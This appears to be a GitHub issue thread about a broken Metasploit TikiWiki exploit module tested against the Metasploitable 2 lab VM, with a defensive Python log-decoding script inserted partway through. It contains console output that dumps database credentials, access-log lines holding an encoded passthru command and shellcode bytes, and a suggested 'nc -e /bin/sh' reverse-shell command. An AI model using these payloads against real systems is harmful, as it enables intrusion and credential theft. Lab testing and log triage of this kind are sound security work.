the webapp "tikiwiki_graph_formula_exec" no longer works
Hi
I use metasploit (Framework: 6.4.50-dev / Console : 6.4.50-dev) from Kali Linux.
I want to use the "old" webapp "tikiwiki_graph_formula_exec" against metasploitable-2 (2010-04-27)
I use the payload "generic/shell_bind_tcp".
With others, I have the error message: All encoders failed to encode.
On msfconsole:
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > show options
Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.0.0.84        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /tikiwiki        yes       TikiWiki directory path
   VHOST                     no        HTTP server virtual host

Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  10.0.0.84        no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.
When I run:
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :
db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki : tikiwiki195
[*] Attempting to execute our payload...
[*] Started bind TCP handler against 10.0.0.84:4444
[*] Exploit completed, but no session was created.
On the target, the file /var/log/apache2/access.log contains:
10.0.0.60 - - [06/Mar/2025:07:16:43 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=948&h=194&s=103&min=387&max=456&f[]=x.sinh.passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))&t=pdf&title= HTTP/1.1" 200 14976 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.60 - - [06/Mar/2025:07:16:43 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=4&h=738&s=331&min=980&max=1065&f[]=x.asinh.RWQP\xd9\xe0\xd9t$\xf4_WRZ_)\xd2QPXY\x81\xc2\xfe\x01" 200 - "-" "-"
If I attack with TikiWiki_1.9.5_Exploit, it works.
The file /var/log/apache2/access.log contains:
10.0.0.60 - - [06/Mar/2025:07:30:43 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=185&h=757&s=145&min=366&max=391&f[]=x.min.passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))&t=pdf&title= HTTP/1.1" 200 21024 "-" "curl/8.12.1"
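A defender's reading of the access.log entries quoted above, as an added example that is not part of the original issue or of Metasploit: it decodes the chr() chains in the f[] parameter of tiki-graph_formula.php requests and flags formulas that carry escaped raw bytes. The function names, the list of PHP call names and the benign sample request are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Two entries copied from the access.log excerpts in the issue (user-agent shortened),
# plus one constructed benign request (the sin(x) line) for contrast.
SAMPLE_LOG = r'''10.0.0.60 - - [06/Mar/2025:07:16:43 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=948&h=194&s=103&min=387&max=456&f[]=x.sinh.passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))&t=pdf&title= HTTP/1.1" 200 14976 "-" "Mozilla/4.0"
10.0.0.60 - - [06/Mar/2025:07:18:02 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=400&h=300&s=1&min=0&max=10&f[]=sin(x)&t=png&title=demo HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.60 - - [06/Mar/2025:07:16:43 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=4&h=738&s=331&min=980&max=1065&f[]=x.asinh.RWQP\xd9\xe0\xd9t$\xf4_WRZ_)\xd2QPXY\x81\xc2\xfe\x01" 200 - "-" "-"
'''

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S*tiki-graph_formula\.php\?[^"]*)"')
FORMULA = re.compile(r'f\[\]=([^&]*)')
CHR_CALL = re.compile(r'chr\((\d+)\)')
# PHP functions that run code or commands; none belongs in a graph formula.
EXEC_CALL = re.compile(r'\b(passthru|system|shell_exec|exec|popen|proc_open|eval)\s*\(')
RAW_BYTE = re.compile(r'\\x[0-9a-fA-F]{2}')  # Apache logs non-printable bytes as \xhh

def decode_chr_chain(formula):
    """Rebuild the string hidden in chr(N).chr(N)... concatenations."""
    return ''.join(chr(int(n)) for n in CHR_CALL.findall(formula) if int(n) < 0x110000)

def triage(log_text):
    """Return one finding per suspicious f[] formula found in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, url = m.groups()
        for formula in FORMULA.findall(unquote(url)):  # also handles f%5B%5D=
            reasons = []
            call = EXEC_CALL.search(formula)
            if call:
                reasons.append('php-call:' + call.group(1))
            if RAW_BYTE.search(formula):
                reasons.append('raw-bytes')
            decoded = decode_chr_chain(formula)
            if reasons or decoded:
                findings.append({'client': client, 'reasons': reasons, 'decoded': decoded})
    return findings

if __name__ == '__main__':
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The first entry decodes to the command that reads db/local.php, while the second is flagged only for raw bytes in a parameter that the application treats as a formula.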
Try using a simpler payload like:
set PAYLOAD cmd/unix/generic
set CMD "nc -e /bin/sh your-kali-ip 4444"
That might work.
No :-( With these commands:
set PAYLOAD cmd/unix/generic
set CMD "nc -e /bin/sh 10.0.0.60 4444"
the run command shows:
[-] Exploit failed: cmd/unix/generic is not a compatible payload.
[*] Exploit completed, but no session was created.
This module is ARCH_PHP:
https://github.com/rapid7/metasploit-framework/blob/54cdcc6731468e7577fc6674b357096d5c710841/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb#L43
The module includes the payload within PHP code.
https://github.com/rapid7/metasploit-framework/blob/54cdcc6731468e7577fc6674b357096d5c710841/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb#L202
Have you tried setting a compatible PHP payload?
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/
set payload php/bind_perl set payload php/download_exec set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/reverse_perl
set payload php/bind_perl_ipv6 set payload php/exec set payload php/meterpreter/bind_tcp_uuid set payload php/reverse_php
set payload php/bind_php set payload php/meterpreter/bind_tcp set payload php/meterpreter/reverse_tcp
set payload php/bind_php_ipv6 set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter/reverse_tcp_uuid
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
21 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
Today I tried unsuccessfully on the latest Kali Linux after an update.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/
set payload php/bind_perl set payload php/exec set payload php/meterpreter/reverse_tcp
set payload php/bind_perl_ipv6 set payload php/meterpreter/bind_tcp set payload php/meterpreter/reverse_tcp_uuid
set payload php/bind_php set payload php/meterpreter/bind_tcp_ipv6 set payload php/reverse_perl
set payload php/bind_php_ipv6 set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/reverse_php
set payload php/download_exec set payload php/meterpreter/bind_tcp_uuid
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
21 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/bind_perl
payload => php/bind_perl
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/bind_perl: All encoders failed to encode.
[*] Exploit completed, but no session was created
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/bind_php
payload => php/bind_php
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/bind_php: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/meterpreter/bind_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/meterpreter/bind_tcp_uuid
payload => php/meterpreter/bind_tcp_uuid
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/meterpreter/bind_tcp_uuid: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/meterpreter/reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp_uuid
payload => php/meterpreter/reverse_tcp_uuid
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/meterpreter/reverse_tcp_uuid: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/reverse_perl
payload => php/reverse_perl
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/reverse_perl: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/reverse_php: All encoders failed to encode.
[*] Exploit completed, but no session was created.
Looks like this module is broken.
The defined BadChars are quite restrictive:
https://github.com/rapid7/metasploit-framework/blob/b5129fe19874e74d5a103bb9d1372fb30f618b32/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb#L40
Unfortunately, using a Base64 encoder (php/base64, php/minify, php/hex) will still use bad characters (' or ").
Can confirm this module doesn't work exploiting tikiwiki on Metasploitable 2 VM. Haven't tested with other tikiwiki instances.